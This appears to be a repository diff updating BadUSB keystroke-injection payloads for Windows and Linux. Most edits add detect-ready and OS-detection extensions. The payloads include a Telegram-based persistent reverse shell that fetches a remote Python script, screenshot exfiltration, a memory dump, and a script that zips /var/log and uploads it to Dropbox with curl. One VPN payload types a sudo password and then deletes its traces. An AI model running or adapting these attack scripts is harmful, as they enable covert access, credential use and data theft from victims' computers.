REM # Author : Aleff # # Title : Persistent Reverse Shell - Telegram Based #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : Execution # # Version : 1.0 #
REM # Target : Linux # # Category : Execution #
REM # # # Target : Linux #
REM ############################################################ # #
############################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000

21
payloads/library/execution/SendEmailThroughThunderbird/payload.txt
View File

@ -1,13 +1,14 @@
REM ######################################################## REM_BLOCK
REM # | ########################################################
REM # Title : Send Email Through Thunderbird | # #
REM # Author : Aleff | # Title : Send Email Through Thunderbird #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 - Linux(debian tested) | # Category : Execution #
REM # | # Target : Windows 10/11 - Linux(debian tested) #
REM ######################################################## # #
########################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection

64
payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt
View File

@ -1,22 +1,64 @@
REM ############################################################ REM_BLOCK
REM # | ############################################################
REM # Title : Send Messages In Discord Channel-Server | # #
REM # Author : Aleff | # Title : Send Messages In Discord Channel-Server #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Execution #
REM # | # Target : Windows 10-11 #
REM ############################################################ # #
############################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet connection REM - Internet connection
REM - Discord Installed REM - Discord Installed
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example DEFINE #CHAT_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app REM Open Discord app
GUI GUI

76
payloads/library/execution/SetArbitraryVPN_Linux/payload.txt
View File

@ -1,13 +1,14 @@
REM_BLOCK
REM #################################### ####################################
REM # | # #
REM # Title : Set Arbitrary VPN | # Title : Set Arbitrary VPN #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Execution | # Category : Execution #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM #################################### ####################################
END_REM
REM Requirements: REM Requirements:
REM - Permissions REM - Permissions
@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com DEFINE #VPN_FILE_LINK example.com
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### PERMISSIONS SECTION #### REM #### PERMISSIONS SECTION ####
STRINGLN sudo su
STRING sudo su
ENTER
DELAY 1000 DELAY 1000
STRING SUDO_PASS STRINGLN #SUDO_PASS
ENTER
DELAY 1000 DELAY 1000
REM #### VPN SECTION #### REM #### VPN SECTION ####
STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
REM It depends by the internet connection REM It depends by the internet connection
DELAY 2000 DELAY 2000
STRING openvpn vpn_configuration.ovpn STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power REM It depends by the computer power
DELAY 2000 DELAY 2000
REM #### REMOVE TRACES #### REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn STRING rm vpn_configuration.ovpn
ENTER ENTER
DELAY 500 DELAY 500

14
payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit/payload.txt
View File

@ -1,12 +1,12 @@
REM_BLOCK REM_BLOCK
################################################################ ################################################################
# | # #
# Title : Set An Arbitrary And Persistent Tor Circuit | # Title : Set An Arbitrary And Persistent Tor Circuit #
# Author : Aleff | # Author : Aleff #
# Version : 1.0 | # Version : 1.0 #
# Category : Execution | # Category : Execution #
# Target : Windows 10/11; Linux; | # Target : Windows 10/11; Linux; #
# | # #
################################################################ ################################################################
Requirements: Requirements:

65
payloads/library/execution/Set_An_Arbitrary_DNS-IPv4_version/payload.txt
View File

@ -1,24 +1,65 @@
REM ######################################################## REM_BLOCK
REM # | ########################################################
REM # Title : Set An Arbitrary DNS (IPv4 version) | # #
REM # Author : Aleff | # Title : Set An Arbitrary DNS (IPv4 version) #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 11 | # Category : Execution #
REM # | # Target : Windows 11 #
REM ######################################################## # #
########################################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing REM - Nothing
REM DNS IPv4 like Cloudflare DNS 1.1.1.1 REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example DEFINE DNS example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Settings REM Open Settings
DELAY 1000
GUI GUI
DELAY 1000 DELAY 1000
STRING settings STRING settings

20
payloads/library/execution/Set_Tor_Bridge_In_Windows/payload.txt
View File

@ -1,12 +1,14 @@
REM ################################### REM_BLOCK
REM # | ###################################
REM # Title : Set Tor Bridge | # #
REM # Author : Aleff | # Title : Set Tor Bridge #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Execution #
REM # | # Target : Windows 10/11 #
REM ################################### # #
###################################
END_REM
REM Requirements: REM Requirements:
REM - Tor installed REM - Tor installed

64
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt
View File

@ -1,17 +1,61 @@
REM #################################################################################### REM_BLOCK
REM # | ####################################################################################
REM # Title : Starting a PowerShell with administrator permissions in Windows | # #
REM # Author : Aleff | # Title : Starting a PowerShell with administrator permissions in Windows #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Execution #
REM # | # Target : Windows 10-11 #
REM #################################################################################### # #
####################################################################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing REM - Nothing
DELAY 1000 EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x GUI x
DELAY 500 DELAY 500
STRING a STRING a

72
payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt
View File

@ -1,28 +1,68 @@
REM_BLOCK
REM ##################################################### #####################################################
REM # | # #
REM # Title : Stop A Single Process In Windows | # Title : Stop A Single Process In Windows #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Execution | # Category : Execution #
REM # Target : Windows 10/11 | # Target : Windows 10/11 #
REM # | # #
REM ##################################################### #####################################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing REM - Nothing
REM Write the name of the process that you want to stop REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example DEFINE PROCESS_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Task Manager REM Open Task Manager
GUI GUI
DELAY 1000 DELAY 1000
STRING Task Manager STRINGLN Task Manager
ENTER
DELAY 1000 DELAY 1000
REM Goto search bar REM Goto search bar
@ -36,9 +76,7 @@ TAB
DELAY 500 DELAY 500
REM Write the process name REM Write the process name
STRING PROCESS_NAME STRINGLN PROCESS_NAME
DELAY 500
ENTER
DELAY 500 DELAY 500
TAB TAB
DELAY 500 DELAY 500

49
payloads/library/execution/Telegram_Persistent_Connection_Linux/payload.txt
View File

@ -1,12 +1,14 @@
REM ####################################################### REM_BLOCK
REM # | #######################################################
REM # Title : Telegram Persistent Connection Linux | # #
REM # Author : Aleff | # Title : Telegram Persistent Connection Linux #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Linux | # Category : Execution #
REM # | # Target : Linux #
REM ####################################################### # #
#######################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
@ -14,7 +16,34 @@ REM - Internet Connection
REM Here you must put your own file link REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000

67
payloads/library/execution/UninstallSignal/payload.txt
View File

@ -1,12 +1,14 @@
REM ##################################### REM_BLOCK
REM # | #####################################
REM # Title : Uninstall Signal | # #
REM # Author : Aleff | # Title : Uninstall Signal #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Execution #
REM # | # Target : Windows 10-11 #
REM ##################################### # #
#####################################
END_REM
REM Plug-And-Play <3 REM Plug-And-Play <3
@ -14,11 +16,52 @@ REM Requirements:
REM - Signal App installed REM - Signal App installed
REM - ExecutionPolicy Bypass REM - ExecutionPolicy Bypass
DELAY 2000 EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 1000 DELAY 1000
STRING powershell STRINGLN powershell
ENTER
DELAY 2000 DELAY 2000
STRINGLN Stop-Process -Name "Signal" STRINGLN Stop-Process -Name "Signal"

8
payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md
View File

@ -36,17 +36,11 @@ In addition to legal implications, **unauthorized removal of an application can
</a> </a>
<br>Github <br>Github
</td> </td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96"> <td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a> </a>
<br>Discord <br>Linkedin
</td> </td>
</tr> </tr>
</table> </table>

66
payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################################## REM_BLOCK
REM # | ##############################################################################
REM # Title : Uninstall A Specific App On Windows Through Control Panel | # #
REM # Author : Aleff | # Title : Uninstall A Specific App On Windows Through Control Panel #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Execution #
REM # | # Target : Windows 10/11 #
REM ############################################################################## # #
##############################################################################
END_REM
REM Requirements: REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^) REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
@ -17,15 +19,55 @@ REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)` REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE #APP_NAME example DEFINE #APP_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Windows research REM Open Windows research
DELAY 2000
GUI GUI
DELAY 1000 DELAY 1000
REM Search and opern explorer app REM Search and opern explorer app
STRING explorer STRINGLN explorer
ENTER
DELAY 1000 DELAY 1000
REM Goto search bar and open "Uninstall or change a program" page REM Goto search bar and open "Uninstall or change a program" page

22
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
View File

@ -1,18 +1,18 @@
REM ######################################################## REM_BLOCK
REM # # ########################################################
REM # Title : Dump Windows Memory Through ProcDump # # #
REM # Author : Aleff # # Title : Dump Windows Memory Through ProcDump #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : Exfiltration # # Version : 1.0 #
REM # Target : Windows # # Category : Exfiltration #
REM # # # Target : Windows #
REM ######################################################## # #
########################################################
END_REM
REM Requirements: REM Requirements:
REM - Authorization to execute powershell commands REM - Authorization to execute powershell commands
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a

64
payloads/library/exfiltration/Exfiltrate Computer Screenshots/payload.txt
View File

@ -1,13 +1,12 @@
REM ################################################### ###################################################
REM # | # #
REM # Title : Exfiltrate Computer Screenshots | # Title : Exfiltrate Computer Screenshots #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Exfiltrate | # Category : Exfiltrate #
REM # Target : Windows 10-11 | # Target : Windows 10-11 #
REM # | # #
REM ################################################### ###################################################
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
@ -15,12 +14,53 @@ REM - Discord Webhook (or whatever you want for the exfiltration)
REM - ExecutionPolicy Bypass REM - ExecutionPolicy Bypass
REM - Python REM - Python
REM REQUIRED - Set your Python script link REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com DEFINE SCRIPT-PY-LINK example.com
DELAY 1000 EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 1000 DELAY 1000
STRING powershell STRING powershell

4
payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
View File

@ -1,11 +1,9 @@
# Exfiltrate Linux Content With Dropbox - BADUSB ✅ # Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems. A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution **Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description ## Description
A script used to take folder content on Linux Systems. A script used to take folder content on Linux Systems.

4
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
View File

@ -1,12 +1,10 @@
# Exfiltrate Linux Log Files - BADUSB ✅ # Exfiltrate Linux Log Files
A script used to take linux logs. A script used to take linux logs.
**Category**: Exfiltration, Execution **Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description ## Description
A script used to take linux logs. A script used to take linux logs.

99
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
View File

@ -1,80 +1,93 @@
REM ###################################################### REM_BLOCK
REM # | ######################################################
REM # Title : Exfiltrate Linux Logs With Dropbox | # #
REM # Author : Aleff | # Title : Exfiltrate Linux Logs With Dropbox #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration, Execution | # Version : 1.0 #
REM # Target : Linux | # Category : Exfiltration, Execution #
REM # | # Target : Linux #
REM ###################################################### # #
######################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
REM - Dropbox Account REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN REM - - DROPBOX_ACCESS_TOKEN
DELAY 1000
CTRL-ALT t
REM Required: Set here your Dropbox access TOKEN REM Required: Set here your Dropbox access TOKEN
DELAY 2000 DEFINE #TOKEN example
DEFINE TOKEN example
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
REM Send to Dropbox function
DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500 DELAY 500
STRING USER_NAME=$(whoami) STRINGLN USER_NAME=$(whoami)
ENTER
REM Create random num REM Create random num
DELAY 500 DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1) STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
REM Folder path REM Folder path
DELAY 500 DELAY 500
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX) STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
ENTER
REM Zip path REM Zip path
DELAY 500 DELAY 500
STRING ZIP_NAME="$RANDOM.zip" STRINGLN ZIP_NAME="$RANDOM.zip"
ENTER
DELAY 500 DELAY 500
STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME" STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
ENTER
REM Default log path REM Default log path
DELAY 500 DELAY 500
STRING LOG_PATH="/var/log/" STRINGLN LOG_PATH="/var/log/"
ENTER
DELAY 500 DELAY 500
STRING zip -r "$ZIP_PATH" "$LOG_PATH" STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
ENTER
REM Delay of zipping operation - it depends REM Delay of zipping operation - it depends
DELAY 10000 DELAY 10000
DELAY 500 DELAY 500
STRING DROPBOX_FOLDER="/$ZIP_NAME" STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
ENTER
REM Send to Dropbox function
DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500 DELAY 500
STRING curl -X POST STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
STRING DROPBOX_API_LINK
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER
REM Send timing - it depends REM Send timing - it depends
DELAY 5000 DELAY 5000
DELAY 500 DELAY 500
